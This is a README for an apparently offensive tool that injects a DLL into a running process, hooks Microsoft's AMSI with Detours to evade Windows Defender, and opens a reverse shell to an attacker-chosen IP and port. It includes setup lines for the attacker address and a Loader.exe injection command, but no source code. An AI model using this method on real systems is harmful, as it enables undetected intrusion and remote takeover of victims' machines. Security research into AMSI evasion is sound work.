A crafted/AMSI-Bypassing injectable DLL for establishing an undetected Reverse Shell using Microsoft Detours.

This artefact allows to bypass Microsoft's AMSI interface (Windows Defender base) by going through Microsoft Detours in order to intercept and hijack the function calls that emanate from it, so as to launch an undetectable reverse shell and take control of the victim's machine. This is obviously only a POC and this tool/method can be extended to an infinite number of possibilities.

Usage :

In CustomDLL.cpp :

ip = (char*)"<YOUR_IP_ADDRESS>"; // REPLACE WITH YOUR IP ADDRESS 
port = 0000; // TCP PORT YOU'RE LISTENING ON

Loader.exe <PID> <PATH_TO_CUSTOM_DLL>

Injection on notepad.exe & Reverse shell :

Normal Scenario :

DLL injection & AMSI bypassing through Detours :

Crafted module loaded among the others :

References :
Understanding and bypassing AMSI
OverviewInterception
Microsoft Detours Package
NTDLL Unhooked Reverse Shell

Xacone/AMSI-DLL-Injection

A crafted/AMSI-Bypassing injectable DLL for establishing an undetected Reverse Shell using Microsoft Detours.

Usage :

Injection on notepad.exe & Reverse shell :

Normal Scenario :

DLL injection & AMSI bypassing through Detours :